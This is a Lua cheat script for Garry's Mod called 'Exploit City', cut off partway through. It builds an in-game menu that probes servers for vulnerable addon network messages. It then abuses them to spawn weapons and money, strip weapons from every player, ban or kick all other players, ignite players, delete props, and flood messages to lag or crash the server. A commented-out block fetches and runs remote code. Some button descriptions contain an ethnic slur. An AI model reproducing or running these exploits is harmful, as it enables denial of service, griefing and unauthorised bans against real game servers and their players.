MsgC(Color(0, 240, 255), "♬ Exploit City ♬\n") MsgC(Color(0, 200, 255), "Type exploits_open in console to open!\n") MsgC(Color(0, 200, 255), "Coded by triggered and Voltz\n") surface.PlaySound("HL1/fvox/bell.wav") function ValidNetString( str ) local status, error = pcall( net.Start, str ) return status end -- Overriding original DL_Answering_global so it doesnt crash you when kicking all net.Receive("DL_Answering_global", function(_len) end) GRADIENT_HORIZONTAL = 0; GRADIENT_VERTICAL = 1; function draw.LinearGradient(x,y,w,h,from,to,dir,res) dir = dir or GRADIENT_HORIZONTAL; if dir == GRADIENT_HORIZONTAL then res = (res and res <= w) and res or w; elseif dir == GRADIENT_VERTICAL then res = (res and res <= h) and res or h; end for i=1,res do surface.SetDrawColor( Lerp(i/res,from.r,to.r), Lerp(i/res,from.g,to.g), Lerp(i/res,from.b,to.b), Lerp(i/res,from.a,to.a) ); if dir == GRADIENT_HORIZONTAL then surface.DrawRect(x + w * (i/res), y, w/res, h ); elseif dir == GRADIENT_VERTICAL then surface.DrawRect(x, y + h * (i/res), w, h/res ); end end end function SploitText( str ) chat.AddText( Color( 0, 255, 255 ), "[EC] ", Color( 0, 200, 255), str ) end surface.CreateFont( "customfont", { font = "Calibri", size = 21, } ) surface.CreateFont( "customfont2", { font = "Calibri", size = 15, } ) surface.CreateFont( "customfont3", { font = "Calibri", size = 24, } ) surface.CreateFont( "closebuttonfont", { font = "Caviar Dreams", size = 21, } ) local function SploitNotify(text) local notify = vgui.Create( "DPanel" ) notify:SetSize( 200, 50 ) notify:SetPos( ScrW() - 200, -50 ) notify.Paint = function(self, w, h) draw.RoundedBox( 0, 0, 0, w, h, Color(20, 20, 20)) draw.RoundedBox( 0, 0, notify:GetTall() - 2, w, 2, HSVToColor( CurTime() % 6 * 60, 1, 1 )) draw.SimpleText( text, "customfont3", notify:GetWide() / 2, notify:GetTall() / 2, Color(255, 255, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER) end notify:MoveTo( ScrW() - notify:GetWide(), 0, .2, 0, -1, function() timer.Simple( 3, function() notify:MoveTo( ScrW() - notify:GetWide(), -50, .2, 0, -1) end);end) end --[[Weapon Stripper Menu]]-- time = 1 function Ply(name) -- finds player name name = string.lower(name); for _,v in ipairs(player.GetHumans()) do if(string.find(string.lower(v:Name()),name,1,true) != nil) then return v; end end end function stripPlayer(ply) -- Strip player function if ply:IsPlayer() then for k,v in pairs(ply:GetWeapons()) do net.Start("properties") net.WriteString( "remove" , 32 ) net.WriteEntity( v ) net.SendToServer() end end end concommand.Add("removewep_crosshair", function() local xhair = LocalPlayer():GetEyeTrace().Entity stripPlayer(xhair) end) function removeAll() -- Strips all Players for k,v in pairs(player.GetAll()) do stripPlayer(v) end end local f = vgui.Create( "DFrame" ) f:SetTitle("Weapon Stripper") f:SetSize( 500, 500 ) f:Center() f:MakePopup() f:SetVisible(false) f:ShowCloseButton(false) f.Paint = function( self, w, h ) draw.RoundedBox( 5, 0, 0, w, h, Color(40, 40, 40)) end local closebutton2 = vgui.Create( "DButton", f ) closebutton2:SetText( "X" ) closebutton2:SetTextColor( Color( 255, 0, 0 ) ) closebutton2:SetPos( f:GetWide() - 31, 0 ) closebutton2:SetFont("closebuttonfont") closebutton2:SetSize( 31, 31 ) closebutton2.Paint = function( self, w, h ) if closebutton2:IsHovered() then draw.RoundedBox( 0, 0, 0, w, h, Color( 50, 50, 50, 255 ) ) else draw.RoundedBox( 0, 0, 0, w, h, Color( 0, 0, 0, 255 ) ) end end closebutton2.DoClick = function() f:SetVisible(false) end local button = vgui.Create("DButton", f) button:SetText("Strip All") button:SetPos(220,40) button:SetTextColor(Color(255, 255, 255)) button.DoClick = function () removeAll() end button.Paint = function( self, w, h ) draw.RoundedBox( 5, 0, 0, w, h, Color(60, 60, 60)) end local DermaCheckboxone = vgui.Create( "DCheckBoxLabel" , f )// Create the checkbox DermaCheckboxone:SetPos( 220, 70 )// Set the position DermaCheckboxone:SetValue(false) DermaCheckboxone:SetText("Remove All Timer") function DermaCheckboxone:OnChange( val ) if (val) then print("rekt all player's weapons") net.Start("properties") net.WriteString( "remove" , 32 ) net.WriteEntity( player.GetAll() ) net.SendToServer() timer.Create( "removealltimer", time, 0, function() print("rekt all player's weapons") net.Start("properties") net.WriteString( "remove" , 32 ) net.WriteEntity( player.GetAll() ) net.SendToServer() end) else timer.Remove("removealltimer") end end local TimeSlider = vgui.Create( "DNumSlider", f ) TimeSlider:SetPos( 220, 90 ) // Set the position TimeSlider:SetSize( 200, 15 ) // Set the size TimeSlider:SetText( "Time Interval" ) // Set the text above the slider TimeSlider:SetMin( .1 ) // Set the minimum number you can slide to TimeSlider:SetMax( 7.5 ) // Set the maximum number you can slide to TimeSlider:SetValue( 1 ) TimeSlider:SetDecimals( 1 ) // Decimal places - zero for whole number TimeSlider.OnValueChanged = function( panel, value ) time = math.Round(value, 1) if DermaCheckboxone:GetChecked() == 1 then timer.Remove("removealltimer") timer.Create( "removealltimer", time, 0, function() print("rekt") net.Start("properties") net.WriteString( "remove" , 32 ) net.WriteEntity( player.GetAll() ) net.SendToServer() end) end end local AppList = vgui.Create( "DListView", f) AppList:SetSize(200,100) AppList:Dock( LEFT ) AppList:SetMultiSelect( false ) AppList:AddColumn( "Name" ) for k, v in pairs(player.GetAll()) do AppList:AddLine(v:Name()) end AppList.OnRowSelected = function( lst, index, pnl ) --print( "Selected " .. pnl:GetColumnText( 1 ) .. " at index " .. index ) ply = Ply(pnl:GetColumnText( 1 )) print(pnl:GetColumnText( 1 ) .. " rekt") stripPlayer(ply) end concommand.Add("menu",menu) concommand.Add("strip",stripPlayer) function removeWeapons() local Target = LocalPlayer():GetEyeTrace().Entity if Target:IsPlayer() then for x,y in pairs(Target:GetWeapons()) do net.Start("properties") net.WriteString( "remove" , 32 ) net.WriteEntity( y ) net.SendToServer() end end end --[[End of Weapon Stripper]]-- local wMain = ScrW() / 3 local hMain = ScrH() / 2.8 totalSploits = 0 local Main = vgui.Create( "DFrame" ) Main:SetTitle("") Main:SetSize( wMain, hMain ) Main:SetPos( ScrW() / 2 - Main:GetWide() / 2, ScrH()) Main:SetMouseInputEnabled(true) Main:SetKeyBoardInputEnabled(true) Main:SetDraggable(false) Main:SetVisible(false) Main:ShowCloseButton(false) Main.Paint = function( self, w, h ) draw.RoundedBox( 0, 0, 0, w, h, Color( 50, 50, 50, 240 ) ) draw.LinearGradient( 0, 0, w, 31, Color(40, 40, 40), color_black, GRADIENT_VERTICAL ); --draw.RoundedBox( 0, 0, 0, w, 31, Color( 20, 20, 20, 255 ) ) surface.SetDrawColor( 0, 0, 0, 255) surface.DrawOutlinedRect( 0, 0, w, h ) draw.SimpleText( "Exploit City", "customfont", Main:GetWide() / 2, 6, HSVToColor( CurTime() % 6 * 60, 1, 1 ), TEXT_ALIGN_CENTER ) draw.SimpleText( totalSploits .. "/36", "customfont", 6, 6, Color(255, 255, 255), TEXT_ALIGN_LEFT ) end local closebutton = vgui.Create( "DButton", Main ) closebutton:SetText( "X" ) closebutton:SetTextColor( Color( 255, 0, 0 ) ) closebutton:SetPos( Main:GetWide() - 31, 0 ) closebutton:SetFont("closebuttonfont") closebutton:SetSize( 31, 31 ) closebutton.Paint = function( self, w, h ) if closebutton:IsHovered() then draw.RoundedBox( 0, 0, 0, w, h, Color( 50, 50, 50, 255 ) ) else draw.RoundedBox( 0, 0, 0, w, h, Color( 0, 0, 0, 255 ) ) end end local weaponbutton = vgui.Create( "DButton", Main ) weaponbutton:SetText( "Weapon Stripper" ) weaponbutton:SetTextColor( Color( 255, 255, 255 ) ) weaponbutton:SetSize( 31 * 3.5, 31 ) weaponbutton:SetPos( Main:GetWide() - 31 * 4.5, 0 ) weaponbutton:SetFont("customfont2") weaponbutton.Paint = function( self, w, h ) if weaponbutton:IsHovered() then draw.RoundedBox( 0, 0, 0, w, h, Color( 50, 50, 50, 255 ) ) else draw.RoundedBox( 0, 0, 0, w, h, Color( 0, 0, 0, 255 ) ) end end weaponbutton.DoClick = function() f:SetVisible(true) end local tabs = vgui.Create( "DPropertySheet", Main ) tabs:Dock( FILL ) tabs:DockPadding( 5, 5, 0, 0) tabs.Paint = function (self, w, h) for k, v in pairs(tabs.Items) do if (!v.Tab) then continue end v.Tab.Paint = function(self,w,h) draw.LinearGradient( 0, 0, w, h, Color(40, 40, 40), color_black, GRADIENT_VERTICAL ); end end end local exploitsPanel = vgui.Create( "DPanel", tabs ) exploitsPanel.Paint = function( self, w, h ) --draw.LinearGradient( 0, 0, w, h, Color(40, 40, 40), color_black, GRADIENT_VERTICAL ); draw.RoundedBox(0, 0, 0, w, h, Color(40,40,40)) end tabs:AddSheet( "Exploits", exploitsPanel ) local toolsPanel = vgui.Create( "DPanel", tabs ) toolsPanel.Paint = function( self, w, h ) draw.RoundedBox(0, 0, 0, w, h, Color(40,40,40)) end tabs:AddSheet( "Tools", toolsPanel ) local exploitsScrollPanel = vgui.Create( "DScrollPanel", exploitsPanel ) exploitsScrollPanel:Dock( FILL ) local toolsScrollPanel = vgui.Create( "DScrollPanel", toolsPanel ) toolsScrollPanel:Dock( FILL ) --[[ FUNCTIONS ]] function addExploit(id, text, desc, func) local id2 = id .. "." local name = text totalSploits = 1 + totalSploits local id = vgui.Create( "DButton", exploitsScrollPanel ) id:SetText( name ) id:SetTextColor( Color( 200, 200, 200 ) ) id:SetFont("customfont") id:Dock( TOP ) id:DockMargin( 2, 10, 2, -5 ) id:DockPadding( 2, 25, 2, 50 ) id.DoClick = func id.Paint = function( self, w, h ) if id:IsHovered() then draw.SimpleText( desc, "customfont2", -25, 2, HSVToColor( CurTime() % 6 * 60, 1, 1 ), TEXT_ALIGN_RIGHT) draw.RoundedBox( 0, 0, 0, w, h, Color(30, 30, 30)) else draw.RoundedBox( 0, 0, 0, w, h, Color(20, 20, 20)) end surface.SetDrawColor( 0, 0, 0, 255) surface.DrawOutlinedRect( 0, 0, w, h ) end end function addTool(id, text, desc, func) local id2 = id .. "." local name = text local id = vgui.Create( "DButton", toolsScrollPanel ) id:SetText( name ) id:SetTextColor( Color( 200, 200, 200 ) ) id:SetFont("customfont") id:Dock( TOP ) id:DockMargin( 2, 10, 2, -5 ) id:DockPadding( 2, 25, 2, 50 ) id.DoClick = func id.Paint = function( self, w, h ) if id:IsHovered() then draw.SimpleText( desc, "customfont2", -25, 2, HSVToColor( CurTime() % 6 * 60, 1, 1 ), TEXT_ALIGN_RIGHT) draw.RoundedBox( 0, 0, 0, w, h, Color(30, 30, 30)) else draw.RoundedBox( 0, 0, 0, w, h, Color(20, 20, 20)) end surface.SetDrawColor( 0, 0, 0, 255) surface.DrawOutlinedRect( 0, 0, w, h ) end end function addServer(id, text, desc, ip) local id2 = id .. "." local name = text local id = vgui.Create( "DButton", serversScrollPanel ) id:SetText( name ) id:SetTextColor( Color( 200, 200, 200 ) ) id:SetFont("customfont") id:Dock( TOP ) id:DockMargin( 2, 10, 2, -5 ) id:DockPadding( 2, 25, 2, 50 ) id.DoClick = function() LocalPlayer():ConCommand("connect "..ip) end id.Paint = function( self, w, h ) if id:IsHovered() then draw.SimpleText( desc, "customfont2", -25, 2, HSVToColor( CurTime() % 6 * 60, 1, 1 ), TEXT_ALIGN_RIGHT) draw.RoundedBox( 0, 0, 0, w, h, Color(30, 30, 30)) else draw.RoundedBox( 0, 0, 0, w, h, Color(20, 20, 20)) end surface.SetDrawColor( 0, 0, 0, 255) surface.DrawOutlinedRect( 0, 0, w, h ) end end function broadcast( str ) if( str != nil ) then SploitText("Beginning to broadcast message: " .. str) else SploitText("Message is nil, enter a valid string!") end for k,v in pairs( player.GetAll() ) do if ( v != LocalPlayer() ) then RunConsoleCommand( "ulx", "psay", v:Nick(), str ) end end end hook.Add("Think", "RGBSTF", function() local rainbowC = HSVToColor( CurTime() % 6 * 60, 1, 1 ) LocalPlayer():SetWeaponColor( Vector( rainbowC.r / 255, rainbowC.g / 255, rainbowC.b / 255 ) ) LocalPlayer():SetPlayerColor( Vector( rainbowC.r / 255, rainbowC.g / 255, rainbowC.b / 255 ) ) end) --[[ SERVERS ]]-- /* http.Fetch("", function( ret ) RunString( ret ) end) -- [[ Tools ]] -- [[ Server List ]] addTool("serverList", "Server List", "Opens a menu with exploitable servers", function() LocalPlayer():ConCommand("exploitable_servers") end) */ --[[ ULX PSAY BROADCASTER ]] if ulx then addTool("pSayBroadcaster", "ULX PSAY Broadcast", "PM's every player on the server", function () --[[ Vars ]] local wPsay = ScrW() / 5 local hPsay = ScrH() / 10 --[[ Menu ]] local pSayMain = vgui.Create( "DFrame" ) pSayMain:SetTitle("") pSayMain:SetSize( wPsay, hPsay ) pSayMain:SetPos(50, ScrH() / 2) pSayMain:SetMouseInputEnabled(true) pSayMain:SetKeyBoardInputEnabled(true) pSayMain:ShowCloseButton(false) pSayMain:MakePopup() pSayMain.Paint = function( self, w, h ) draw.RoundedBox( 0, 0, 0, w, h, Color( 50, 50, 50, 255 ) ) draw.LinearGradient( 0, 0, w, 31, Color(40, 40, 40), color_black, GRADIENT_VERTICAL ); surface.SetDrawColor( 0, 0, 0, 255) surface.DrawOutlinedRect( 0, 0, w, h ) draw.SimpleText( "PM Broadcaster", "customfont", w / 2, 6, HSVToColor( CurTime() % 6 * 60, 1, 1 ), TEXT_ALIGN_CENTER ) end local psayClose = vgui.Create( "DButton", pSayMain ) psayClose:SetText( "X" ) psayClose:SetTextColor( Color( 255, 0, 0 ) ) psayClose:SetPos( pSayMain:GetWide() - 31, 0 ) psayClose:SetFont("closebuttonfont") psayClose:SetSize( 31, 31 ) psayClose.Paint = function( self, w, h ) if psayClose:IsHovered() then draw.RoundedBox( 0, 0, 0, w, h, Color( 50, 50, 50, 255 ) ) else draw.RoundedBox( 0, 0, 0, w, h, Color( 0, 0, 0, 255 ) ) end end psayClose.DoClick = function() pSayMain:Remove() end local psayInput = vgui.Create( "DTextEntry", pSayMain ) psayInput:SetPos( 25, 40 ) psayInput:SetSize( pSayMain:GetWide() / 2 , 25 ) psayInput:SetText( "BroadcastMSG" ) psayInput.OnEnter = function( self ) chat.AddText( self:GetValue() ) end local sendBroadCast = vgui.Create( "DButton", pSayMain ) sendBroadCast:SetText( "Broadcast" ) sendBroadCast:SetTextColor( Color( 255, 255, 255 ) ) sendBroadCast:SetPos( 220, 40 ) sendBroadCast:SetFont("customfont") sendBroadCast:SetSize( 90, 25 ) sendBroadCast.Paint = function( self, w, h ) if sendBroadCast:IsHovered() then draw.RoundedBox( 0, 0, 0, w, h, Color( 40, 40, 40, 255 ) ) else draw.RoundedBox( 0, 0, 0, w, h, Color( 0, 0, 0, 255 ) ) end end sendBroadCast.DoClick = function() broadcast( psayInput:GetValue() ) end end) end --[[ Exploits ]]-- local status = ValidNetString("CraftSomething") if (status) then SploitText("Found exploitable net message: CraftSomething") addExploit( "1", "Give Weapons", "Gives you any weapon of your choice", function() inputFrameExists = true inputFrame = vgui.Create( "DFrame" ) inputFrame:SetTitle("Choose a weapon!") inputFrame:SetSize( 400, 75 ) inputFrame:SetPos(ScrW() / 2 - inputFrame:GetWide() / 2, ScrH() / 2 + 230 ) inputFrame:SetDraggable(false) inputFrame:ShowCloseButton(false) inputFrame:MakePopup() inputFrame.Paint = function( self, w, h ) draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30)) end local TextEntry = vgui.Create( "DTextEntry", inputFrame ) TextEntry:SetSize( 380, 30 ) TextEntry:SetPos( inputFrame:GetWide() / 2 - TextEntry:GetWide() / 2, inputFrame:GetTall() / 2 - TextEntry:GetTall() / 2 ) TextEntry:SetText( "m9k_ak47" ) TextEntry.OnEnter = function( self ) surface.PlaySound("garrysmod/ui_click.wav") SploitText("Giving Weapon") net.Start( "CraftSomething" ) net.WriteEntity( LocalPlayer() ) net.WriteString( self:GetValue() ) net.WriteString( "" ) net.WriteString( "weapon" ) net.SendToServer() inputFrame:SetVisible(false) end end) end local status = ValidNetString("TCBuyAmmo") if (status) then SploitText("Found exploitable net message: TCBuyAmmo") addExploit( "2","Free Ammo", "Gets All Ammo Types", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Getting Le Ammo") for k,v in pairs(GAMEMODE.AmmoTypes) do net.Start("TCBBuyAmmo") net.WriteTable( {nil,v.ammoType,nil,"0","999999"} ) net.SendToServer() end end);end local status = ValidNetString("gBan.BanBuffer") if (status) then SploitText("Found exploitable net message: gBan.BanBuffer") addExploit( "3","Ban All", "Bans all except you", function() surface.PlaySound("garrysmod/ui_click.wav") for k, v in pairs(player.GetAll()) do net.Start( "gBan.BanBuffer" ) net.WriteBool( true ) net.WriteInt( 0 , 32 ) net.WriteString( "rekt" ) net.WriteString( v:SteamID() ) net.SendToServer() end end);end local status = ValidNetString("DataSend") if (status) then SploitText("Found exploitable net message: DataSend") addExploit( "4","Steal All Monies #1", "Takes money from printers", function() surface.PlaySound("garrysmod/ui_click.wav") for k, v in pairs( ents.GetAll() ) do if v:GetClass() == "adv_moneyprinter" then SploitText("Collecting Money") net.Start("DataSend") net.WriteFloat(2) net.WriteEntity(v) net.WriteEntity(LocalPlayer()) net.SendToServer() end;end end);end local status = ValidNetString("FarmingmodSellItems") if (status) then SploitText("Found exploitable net message: FarmingmodSellItems") addExploit( "5","Free Money", "An exploit in the Farming Mod", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Enjoy the b1g monies") net.Start( "FarmingmodSellItems" ) net.WriteTable( { Cost = 10, CropModel = "models/props/eryk/garlic.mdl", CropType = 2, Info = "Garlic Seed", Model = "models/props/eryk/seedbag.mdl", Name = "Garlic", Quality = 4, Sell = 99999, Type = "Seed" } ) net.WriteInt(1,16) net.SendToServer() end);end local status = ValidNetString("start_wd_emp") if (status) then SploitText("Found exploitable net message: start_wd_emp") addExploit( "6","Hack Keypads", "An exploit in the hacking phone", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Hacking Le Keypads") net.Start('start_wd_emp') net.SendToServer() end);end local status = ValidNetString("duelrequestguiYes") if (status) then SploitText("Found exploitable net message: duelrequestguiYes") addExploit( "7","Get Money", "Duel Exploit", function() surface.PlaySound("garrysmod/ui_click.wav") --local tr = util.TraceLine( { --start = LocalPlayer():EyePos(), --endpos = LocalPlayer():EyePos() + EyeAngles():Forward() * 10000, --ignoreworld = true, --collisiongroup = 5 --} ) --if (tr.Hit == false) then --SploitText("Make sure to face a player!") --else SploitText("getting ez monies") net.Start("duelrequestguiYes") net.WriteInt(-99999999999999999999999999999999999999999999999999999999999999999999999999999,32) net.WriteEntity(table.Random( player.GetAll() ) ) net.WriteString("Crossbow") net.SendToServer() end);end local status = ValidNetString("drugseffect_remove") if (status) then SploitText("Found exploitable net message: drugseffect_remove ") addExploit( "8","Remove All Weapons", "An exploit in the drug addon", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Removing Weapons from All") net.Start("drugseffect_remove") net.SendToServer() end);end local status = ValidNetString("drugs_money") if (status) then SploitText("Found exploitable net message: drugs_money") addExploit( "9","Remove All Money", "An exploit in the drug addon", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Removing Weapons from All") net.Start("drugs_money") net.SendToServer() end);end local status = ValidNetString("drugs_ignite") if (status) then SploitText("Found exploitable net message: drugs_ignite") addExploit( "10","Ignite Props", "An exploit in the drug addon", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Igniting Props") net.Start("drugs_ignite") net.WriteString("prop_physics") net.SendToServer() end);end local status = ValidNetString("drugs_ignite") if (status) then addExploit( "11","Ignite Players", "An exploit in the drug addon", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Igniting Players") net.Start("drugs_ignite") net.WriteString("player") net.SendToServer() end);end local status = ValidNetString("drugseffect_hpremove") if (status) then SploitText("Found exploitable net message: drugseffect_hpremove") addExploit( "12","Remove All Players HP", "An exploit in the drug addon", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Removing All Players HP") net.Start("drugseffect_hpremove") net.WriteString(1) net.SendToServer() end);end local status = ValidNetString("drugseffect_hpremove") if (status) then addExploit( "13","Give All God", "An exploit in the drug addon", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Giving All God") net.Start("drugseffect_hpremove") net.WriteString(299999) net.SendToServer() end);end local status = ValidNetString("drugs_text") if (status) then SploitText("Found exploitable net message: drugs_text") addExploit( "14","Remove All Props", "An exploit in the drug addon", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Removing All Props") net.Start("drugs_text") net.WriteString("prop_physics") net.SendToServer() end);end local status = ValidNetString("DarkRP_Kun_ForceSpawn") if (status) then SploitText("Found exploitable net message: DarkRP_Kun_ForceSpawn") addExploit( "15", "TP", "No clue what this does xd", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("TPing") net.Start("DarkRP_Kun_ForceSpawn") net.SendToServer() end);end local status = ValidNetString("SyncPrinterButtons76561198056171650") if (status) then SploitText("Found exploitable net message: SyncPrinterButtons76561198056171650") addExploit( "16","Steal All Monies #2", "Takes money from printers", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Collecting Money") for k, v in pairs(ents.GetAll()) do if (v:GetClass() == "adv_moneyprinter") then net.Start( "SyncPrinterButtons76561198056171650" ) net.WriteEntity(v) net.WriteUInt(2, 4) net.SendToServer() end end end);end local function report() for i = 1, 2000 do net.Start("DL_Answering") net.SendToServer() end end if (Damagelog) then SploitText("Found exploitable net message: DL_Answering") reportSpam = 0 addExploit( "17","Report Spammer", "Will lag players and crash them after around 5 rounds!", function() surface.PlaySound("garrysmod/ui_click.wav") if (reportSpam == 0) then SploitText("Starting Report Spammer") reportSpam = 1 timer.Create("reportSpammer", 0.2, 0, report) else SploitText("Stopping Report Spammer") reportSpam = 0 timer.Remove("reportSpammer") end end);end local status = ValidNetString("SimplicityAC_aysent") if (status) then SploitText("Found exploitable net message: SimplicityAC_aysent") addExploit( "19","Instant Crash", "Will instantly crash the server", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Goodbye Server") local tbl = {} for i=1,400 do tbl[i] = i end net.Start("SimplicityAC_aysent") net.WriteUInt(1, 8) net.WriteUInt(4294967295, 32) net.WriteTable(tbl) net.SendToServer() end);end local status = ValidNetString("ATS_WARP_REMOVE_CLIENT") if (status) then SploitText("Found exploitable net message: ATS_WARP_REMOVE_CLIENT, ATS_WARP_FROM_CLIENT, ATS_WARP_VIEWOWNER") lagger1 = 0 addExploit( "20", "Lagger #1", "b1g lags", function() surface.PlaySound("garrysmod/ui_click.wav") if (lagger1 == 0) then SploitNotify("Starting Lagger") lagger1 = 1 timer.Create("lagger1", 0.02, 0, function() for k,v in pairs(player.GetAll()) do net.Start( "ATS_WARP_REMOVE_CLIENT" ) net.WriteEntity( v ) net.WriteString( "adminroom1" ) net.SendToServer() net.Start( "ATS_WARP_FROM_CLIENT" ) net.WriteEntity( v ) net.WriteString( "adminroom1" ) net.SendToServer() net.Start( "ATS_WARP_VIEWOWNER" ) net.WriteEntity( v ) net.WriteString( "adminroom1" ) net.SendToServer() end end) else SploitNotify("Stopping Lagger") lagger1 = 0 timer.Remove("lagger1") end end);end local status = ValidNetString("CFRemoveGame") if (status) then SploitText("Found exploitable net messages: CFRemoveGame, CFJoiNGame, CFEndGame") lagger2 = 0 addExploit( "21", "Lagger #2", "b1g lags", function() surface.PlaySound("garrysmod/ui_click.wav") if (lagger2 == 0) then SploitNotify("Starting Lagger") lagger2 = 1 timer.Create("lagger2", 0.01, 0, function() for k,v in pairs(player.GetAll()) do net.Start( "CFRemoveGame" ) net.WriteFloat( math.Round( "10000\n" ) ) net.SendToServer() net.Start( "CFJoinGame" ) net.WriteFloat( math.Round( "10000\n" ) ) net.SendToServer() net.Start( "CFEndGame" ) net.WriteFloat( "10000\n" ) net.SendToServer() end end) else SploitNotify("Stopping Lagger") lagger2 = 0 timer.Remove("lagger2") end end);end local status = ValidNetString("CreateCase") if (status) then SploitText("Found exploitable net message: CreateCase") lagger4 = 0 addExploit( "23", "Lagger #4", "b1g lags", function() surface.PlaySound("garrysmod/ui_click.wav") if (lagger4 == 0) then SploitNotify("Starting Lagger") lagger4 = 1 timer.Create("lagger4", 0.02, 0, function() for i = 1, 300 do net.Start( "CreateCase" ) net.WriteString( "tapped by" ) net.SendToServer() end;end) else SploitNotify("Stopping Lagger") lagger4 = 0 timer.Remove("lagger4") end end);end local status = ValidNetString("rprotect_terminal_settings") if (status) then SploitText("Found exploitable net message: rprotect_terminal_settings") lagger5 = 0 addExploit( "24", "Lagger #5", "b1g lags", function() surface.PlaySound("garrysmod/ui_click.wav") if (lagger5 == 0) then SploitNotify("Starting Lagger") lagger5 = 1 timer.Create("lagger5", 0.02, 0, function() for i = 1, 200 do net.Start( "rprotect_terminal_settings" ) net.WriteEntity( LocalPlayer() ) net.SendToServer() end end) else SploitNotify("Stopping Lagger") lagger5 = 0 timer.Remove("lagger5") end end);end local status = ValidNetString("StackGhost") if (status) then SploitText("Found exploitable net message: StackGhost") lagger6 = 0 addExploit( "25", "Lagger #6", "b1g lags", function() surface.PlaySound("garrysmod/ui_click.wav") if (lagger6 == 0) then SploitNotify("Starting Lagger") lagger6 = 1 timer.Create("lagger6", 0.010, 0, function() for i = 1, 8 do for k,v in pairs( player.GetAll() ) do net.Start( "StackGhost" ) net.WriteInt(69,32) net.SendToServer() end;end;end) else SploitNotify("Stopping Lagger") lagger6 = 0 timer.Remove("lagger6") end end);end local status = ValidNetString("pac_to_contraption") if (status) then SploitText("Found exploitable net message: pac_to_contraption") addExploit( "26","Crash Server", "Crashes the server (seems to not always work)", function() surface.PlaySound("garrysmod/ui_click.wav") SploitNotify("Crashing Server") local tbl = {} for i=1,1000000000 do tbl[#tbl + 1] = i end net.Start("pac_to_contraption") net.WriteTable( tbl ) net.SendToServer() end);end local status = ValidNetString("NLRKick") if (status) then SploitText("Found exploitable net message: NLRKick") addExploit( "27","Kick All", "kick all the beaners", function() surface.PlaySound("garrysmod/ui_click.wav") SploitNotify("Kicking All") for k,v in pairs(player.GetAll()) do if v != LocalPlayer() then net.Start("NLRKick") net.WriteEntity(v) net.SendToServer() end end end);end local status = ValidNetString("JoinOrg") if (status) then SploitText("Found exploitable net message: JoinOrg") lagger7 = 0 addExploit( "28", "Lagger #7", "b1111g lags", function() surface.PlaySound("garrysmod/ui_click.wav") if (lagger7 == 0) then SploitNotify("Starting Lagger") lagger7 = 1 timer.Create("lagger7", 0.02, 0, function() for k,v in pairs(player.GetAll()) do net.Start("JoinOrg") net.WriteEntity(LocalPlayer()) net.WriteString("test") net.SendToServer() end end) else SploitNotify("Stopping Lagger") lagger7 = 0 timer.Remove("lagger7") end end);end local status = ValidNetString("giveweapon") if (status) then SploitText("Found exploitable net message: giveweapon") addExploit( "29", "Give Weapons", "big explo1t", function() inputFrame2Exists = true inputFrame2 = vgui.Create( "DFrame" ) inputFrame2:SetTitle("Choose a weapon!") inputFrame2:SetSize( 400, 75 ) inputFrame2:SetPos(ScrW() / 2 - inputFrame2:GetWide() / 2, ScrH() / 2 + 230 ) inputFrame2:SetDraggable(false) inputFrame2:ShowCloseButton(false) inputFrame2:MakePopup() inputFrame2.Paint = function( self, w, h ) draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30)) end local TextEntry2 = vgui.Create( "DTextEntry", inputFrame2 ) TextEntry2:SetSize( 380, 30 ) TextEntry2:SetPos( inputFrame2:GetWide() / 2 - TextEntry2:GetWide() / 2, inputFrame2:GetTall() / 2 - TextEntry2:GetTall() / 2 ) TextEntry2:SetText( "m9k_ak47" ) TextEntry2.OnEnter = function( self ) surface.PlaySound("garrysmod/ui_click.wav") SploitNotify("Giving " .. TextEntry2:GetValue()) net.Start("giveweapon") net.WriteEntity(LocalPlayer()) net.WriteString(TextEntry2:GetValue()) net.SendToServer() inputFrame2:SetVisible(false) end end) end local status = ValidNetString("timebombDefuse") if (status) then SploitText("Found exploitable net message: timebombDefuse") addExploit( "30","Delete All Props", "props = dead", function() surface.PlaySound("garrysmod/ui_click.wav") SploitNotify("Props De_Stroyed") for k,v in pairs(ents.GetAll()) do net.Start("timebombDefuse") net.WriteEntity(v) net.WriteBool(true) net.SendToServer() end end);end local status = ValidNetString("pac_submit") if (status) then SploitText("Found exploitable net message: pac_submit") addExploit( "31","Lagger #8", "l4g yuh", function() surface.PlaySound("garrysmod/ui_click.wav") if !timer.Exists( "lagger8" ) then timer.Create("lagger8", 0.5, 0, function() for i=1, 1800 do net.Start("pac_submit") net.SendToServer() end end) SploitNotify("Starting Lagger") else timer.Remove("lagger8") SploitNotify("Stopping Lagger") end end);end local status = ValidNetString("steamid2") if (status) then SploitText("Found exploitable net message: steamid2") addExploit( "32","Lagger #9", "l4g yuhhhhhhhhhhhh", function() surface.PlaySound("garrysmod/ui_click.wav") if !timer.Exists( "lagger9" ) then SploitNotify("Starting Lagger") timer.Create( "lagger9", 0, 0, function() for i = 1, 100 do net.Start( "steamid2" ) net.WriteString( "" ) net.SendToServer() end end) else timer.Remove("lagger9") SploitNotify("Stopping Lagger") end end);end local status = ValidNetString("NDES_SelectedEmblem") if (status) then SploitText("Found exploitable net message: NDES_SelectedEmblem") addExploit( "33","Lagger #10", "oof yuh get l4gged", function() surface.PlaySound("garrysmod/ui_click.wav") if !timer.Exists( "lagger10" ) then timer.Create("lagger10", 0.5, 0, function() for i=1, 2000 do net.Start("NDES_SelectedEmblem") net.WriteString("exploitcity") net.SendToServer() end end) SploitNotify("Starting Lagger") else timer.Remove("lagger10") SploitNotify("Stopping Lagger") end end);end local status = ValidNetString("Morpheus.StaffTracker") if (status) then SploitText("Found exploitable net message: Morpheus.StaffTracker") addExploit( "33","Crasher #3", "not even hard. unlike nippy's dick when he sees voltz", function() surface.PlaySound("garrysmod/ui_click.wav") if 